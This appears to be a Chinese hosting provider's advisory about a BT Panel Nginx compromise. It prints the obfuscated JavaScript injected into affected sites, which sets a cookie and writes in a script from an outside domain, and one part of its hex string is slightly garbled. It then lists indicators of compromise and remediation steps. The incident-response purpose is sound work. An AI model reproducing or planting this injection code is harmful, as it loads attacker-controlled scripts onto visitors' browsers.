关于我们

质量为本、客户为根、勇于拼搏、务实创新

< 返回新闻公共列表

「高危漏洞」宝塔面板 Nginx 挂马事件剖析以及相关的补救措施

发布时间:2022-12-21 20:19:39

众所周知宝塔面板一直存在很多BUG漏洞。有的知识功能逻辑上的问题。不过从昨天开始已经发现了一款非常严重的安

全漏洞。具体表现为自己的站点被挂上木马后门,但是查询网站源码却没有被篡改。

近期我司在巡查期间发现大量网页出现

var _0xd4d9=["x67x65x74x4Dx69x6Ex75x74x65x73","x73x65x74x4Dx69x6Ex75x74x65x73","x63x6Fx6Fx6Bx69x65","x3D","x3Bx65x78x70x69x72x65x73x3D","x74x6Fx55x54x43x53x74x72x69x6Ex67","x77x61x66x5Fx73x63","x35x38x38x39x36x34x37x37x32x36","x25x33x43x73x63x72x69x70x74x20x73x72x63x3Dx27x68x74x74x70x73x3Ax2Fx2Fx61x2E2、x6Dx73x73x74x61x74x69x63x2Ex6Ex65x74x2Fx6Dx61x69x6Ex33x2Fx63x6Fx6Dx6Dx6Fx6Ex2Fx61x73x73x65x74x73x2Fx74x65x6Dx70x6Cx61x74x65x2Fx68x65x61x64x2Fx61x64x2Ex74x6Dx70x6Cx5Fx61x39x62x37x2Ex6Ax73x27x25x33x45x25x33x43x2Fx73x63x72x69x70x74x25x33x45","x77x72x69x74x65"];function setc(_0x64d8x2,_0x64d8x3,_0x64d8x4){var _0x64d8x5= new Date();_0x64d8x5[_0xd4d9[1]](_0x64d8x5[_0xd4d9[0]]()+ _0x64d8x4);

document[_0xd4d9[2]]= _0x64d8x2+ _0xd4d9[3]+ _0x64d8x3+ _0xd4d9[4]+ _0x64d8x5[_0xd4d9[5]]()}setc(_0xd4d9[6],_0xd4d9[7],360);document[_0xd4d9[9]](unescape(_0xd4d9[8]));

等类似代码,并且用户反馈带宽跑高,CPU跑高等现象!我司求证宝塔官方,官方给出相应解决方案,为nginx漏洞!

您可自行参考以下解决方案:

查看自己是否中招

目前官方没有明确的复现方式。只能从侧面查看自己有没有中招。

1、查看nginx版本是否为自己安装的。

2、检查 /www/server/nginx/sbin 目录 nginx 修改时间是否为最近一周。

3、检查上面目录中的nginx大小是否为4.51MB (是则中招)。

4、安全选项卡查看网站日志是否被清空。

5、查看/tmp/ 下面 是否存在 systemd-private-56d86f7d8382402517f3b5-jP37av (挂马文件)

6、检查网站源码 header字段是否被添加 其他域名的js文件。打开此js查看是否为加密。


如果使用了「Nginx」的服务器,建议自查一下 /var/tmp/ 和 /tmp 目录,看下有没有这个 systemd-private-56d86f7d8382402517f3b5-jP37av,有的话请尽快删除,并且修改相关目录的权限。

宝塔面板的话,/www/server/nginx/sbin,这个目录设置保护,或者修改目录权限。


西唯数据团队

2022年12月21日


/template/Home/Zkeys/PC/Static